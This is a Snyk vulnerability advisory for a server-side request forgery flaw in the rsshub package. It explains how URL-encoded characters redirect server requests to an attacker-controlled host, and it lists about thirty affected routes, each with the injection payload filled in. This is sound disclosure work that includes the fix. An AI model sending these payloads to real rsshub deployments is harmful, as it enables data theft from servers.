Server-side Request Forgery (SSRF) Affecting rsshub package, versions <1.0.0-master.a66cbcf


0.0
high

Snyk CVSS

    Attack Complexity Low
    User Interaction Required
    Scope Changed
    Confidentiality High

    Threat Intelligence

    Exploit Maturity Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-RSSHUB-3228584
  • published 12 Jan 2023
  • disclosed 11 Jan 2023
  • credit Dwi Siswanto

Introduced: 11 Jan 2023

CVE NOT AVAILABLE CWE-918 Open this link in a new tab

How to fix?

Upgrade rsshub to version 1.0.0-master.a66cbcf or higher.

Overview

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) such that an attacker can send a request to the affected routes with a malicious URL. For example, if an attacker controls the ATTACKER.HOST domain, they can send a request to affected routes with the value set to ATTACKER.HOST%2F%23.

The %2F and %23 characters are URL-encoded versions of the forward-slash (/) and pound (#) characters, respectively. In this context, an attacker could use those characters to append the base URL (i.e. https://${input}.defined.host) to be modified to https://ATTACKER.HOST/#.defined.host. This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server.

Note: The following routes are affected by this vulnerability:

  • /19lou/ATTACKER.HOST%2F%23/foo
  • /bandisoft/1/ATTACKER.HOST%2F%23
  • /bendibao/news/ATTACKER.HOST%2F%23
  • /bitbucket/commits/.* (special treatment, set the BITBUCKET_USERNAME environment value to ATTACKER.HOST%2F%23)
  • /blogs/hedwig/ATTACKER.HOST%2F%23
  • /booth.pm/shop/ATTACKER.HOST%2F%23
  • /caixin/blog/ATTACKER.HOST%2F%23
  • /cnjxol/ATTACKER.HOST%2F%23
  • /dut/ATTACKER.HOST%2F%23
  • /eagle/blog/ATTACKER.HOST%2F%23
  • /engadget/ATTACKER.HOST%2F%23
  • /fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar
  • /gamme/ATTACKER.HOST%2F%23
  • /gitlab/explore/foo/ATTACKER.HOST%2F%23
  • /gumroad/ATTACKER.HOST%2F%23/foo
  • /itch/devlog/ATTACKER.HOST%2F%23/1
  • /javdb/tags/foo=bar?domain=ATTACKER.HOST
  • /mastodon/account_id/ATTACKER.HOST/1/statuses
  • /mastodon/remote/ATTACKER.HOST
  • /mastodon/timeline/ATTACKER.HOST
  • /mirror/ATTACKER.HOST%2F%23id (special treatment, should end with id)
  • /people/ATTACKER.HOST%2F%23
  • /pornhub/ATTACKER.HOST%2F%23/category_url/foo
  • /pornhub/ATTACKER.HOST%2F%23/model/foo
  • /pornhub/ATTACKER.HOST%2F%23/pornstar/foo
  • /pornhub/ATTACKER.HOST%2F%23/users/foo
  • /scitation/ATTACKER.HOST%2F%23/foo
  • /solidot/ATTACKER.HOST%2F%23
  • /touhougarakuta/ATTACKER.HOST%2F%23/foo
  • /yahoo-news/ATTACKER.HOST%2F%23
  • /zhubai/ATTACKER.HOST%2F%23
  • /ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar